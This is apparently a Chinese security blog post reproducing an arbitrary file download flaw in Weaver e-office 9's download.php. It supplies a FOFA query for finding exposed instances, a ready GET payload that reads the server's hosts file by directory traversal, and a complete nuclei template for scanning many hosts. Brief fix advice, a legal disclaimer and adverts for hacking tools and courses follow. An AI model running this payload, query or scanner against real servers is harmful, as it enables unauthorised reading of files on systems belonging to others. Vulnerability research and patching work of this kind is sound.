泛微e-office download.php任意文件

0x01 应用介绍

泛微e-office系统是标准、易用、快速部署上线的专业协同OA软件,国内协同OA办公领域领导品牌,致力于为企业用户提供专业OA办公系统、移动OA应用等协同OA整体解决方案

0x02 影响版本及语法特征

泛微e-offcie9
fofa:app=”泛微-EOffice” && body=”您的浏览器处于弹出窗口阻止模式!建议您关闭”

0x03 漏洞复现

payload:/general/file_folder/file_new/neworedit/download.php?filename=hosts&dir=C:\Windows\System32\drivers\etc\
直接使用get请求拼接该payload即可下载目标主机hosts文件

泛微e-office download.php任意文件_第1张图片

下载完成后打开文件查看
 

泛微e-office download.php任意文件_第2张图片


下载服务器文件复现成功

nuclei

id: fanwei-E-Office-file-read
info:
  name: fanwei-E-Office-file-read
  author: fanwei-E-Office-file-read
  severity: critical
  tags: fanwei

http:
  - raw:
    - |
        GET /general/file_folder/file_new/neworedit/download.php?filename=hosts&dir=C:\Windows\System32\drivers\etc\ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "127.0.0.1"
      - type: status
        status:
          - 200

图片

修复建议

使用最新版本的应用

限制漏洞路径的访问

申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,

所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.

图片

没看够~?欢迎关注!

免费领取安全学习资料包!(私聊进群一起学习,共同进步)泛微e-office download.php任意文件_第3张图片

渗透工具

泛微e-office download.php任意文件_第4张图片

技术文档、书籍

泛微e-office download.php任意文件_第5张图片 泛微e-office download.php任意文件_第6张图片

泛微e-office download.php任意文件_第7张图片

面试题

帮助你在面试中脱颖而出

泛微e-office download.php任意文件_第8张图片

视频

基础到进阶

环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等

泛微e-office download.php任意文件_第9张图片 

泛微e-office download.php任意文件_第10张图片

应急响应笔记

泛微e-office download.php任意文件_第11张图片

学习路线

你可能感兴趣的:(漏洞复现,php,开发语言,系统安全)